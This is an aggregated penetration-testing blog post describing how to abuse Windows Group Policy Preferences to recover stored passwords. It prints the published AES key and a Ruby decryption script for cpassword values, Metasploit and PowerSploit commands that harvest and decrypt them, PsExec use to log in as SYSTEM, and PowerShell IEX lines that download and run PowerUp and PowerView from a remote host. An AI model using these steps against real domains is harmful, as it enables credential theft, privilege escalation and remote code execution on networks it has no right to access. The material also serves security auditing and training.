Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

Group Policy Preferences

0
0

Group policy preferences allows domain admins to create and deploy across the domainlocal users and local administrators accounts. This feature was introduced in windows 2008 Server however it can be abused by an attacker since the credentials of theseaccounts are stored encrypted and the public key is published by Microsoft.This leaves the door open to any user to retrieve these files and decryptthe passwords storedin order to elevate access.

These files are stored in a shared directory in the domain controllerand any authenticated user in the domain hasread access to these files since it is neededin order to obtaingroup policy updates.

Thestatic key which can decryptpasswords stored in Group Policy Preferencescan be seen below:

4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b Manual Exploitation

In order to exploit this issue manually it is needed to manually browse to the Groups.xml file which is stored in a shared directory inthe domain controller and obtain the value of the attribute cpassword .


Group Policy Preferences

GPP cpassword Value

Then this value can be passed into another tool which can decrypt the value.


Group Policy Preferences

Decrypting GPP Passwords Manually

Chris Gates wrote a ruby script for decrypting cpassword values.

require 'rubygems' require 'openssl' require 'base64' encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" def decrypt(encrypted_data) padding = "=" * (4 - (encrypted_data.length % 4)) epassword = "#{encrypted_data}#{padding}" decoded = Base64.decode64(epassword) key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\ x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\ x33\xb6\x6c\x1b" aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") aes.decrypt aes.key = key plaintext = aes.update(decoded) plaintext << aes.final pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion return pass end blah = decrypt(encrypted_data) puts blah Metasploit

Decrypting passwords that are stored in the Group Policy Preferences can be doneautomatically though Metaasploit. The following post exploitation modulewill obtain and decrypt the cPassword fromthe Groups.xml file which is stored in the SYSVOL.

post/windows/gather/credentials/gpp
Group Policy Preferences

Metasploit Decrypting GPP Passwords

Since domain administrators canset up local administrators accountsthrough the Group Policy this can lead to privilege escalation. These credentials can be usedwith the PsExec Metasploit module in order to successfully login to the workstation as SYSTEM.


Group Policy Preferences

Metasploit PsExec Usage


Group Policy Preferences

PsExec Authentication as Administrator

PowerSploit

Alternatively the same results can be achieved throughPowerSploit. There are two moduleswhich can obtain and decrypt the cPassword from the Groups.xml file eitherlocally or directly from the domain controller.

Get-CachedGPPPassword //For locally stored GP Files Get-GPPPassword //For GP Files stored in the DC
Group Policy Preferences

PowerSploit Get-CachedGPPPassword

PowerShell via Metasploit

As there are many PowerShell scripts that can be used for post exploitation it is possible to use Metasploit in order to inject a PowerShell payload into a specific process.This could allowthe execution ofPowerShell scripts directly from memory.


Group Policy Preferences

Injecting PowerShell Payload into a Process

Then from the interactive PowerShell session the Invoke-Expression cmdlet could be utilized in order to drop and execute any PowerShell script that is locally hosted.

IEX(New-Object Net.WebClient).DownloadString("http://192.168.100.3/tmp/PowerUp.ps1") IEX(New-Object Net.WebClient).DownloadString("http://192.168.100.3/tmp/PowerView.ps1")
Group Policy Preferences

Executing PowerSploit Modules via Metasploit


Viewing all articles
Browse latest Browse all 12749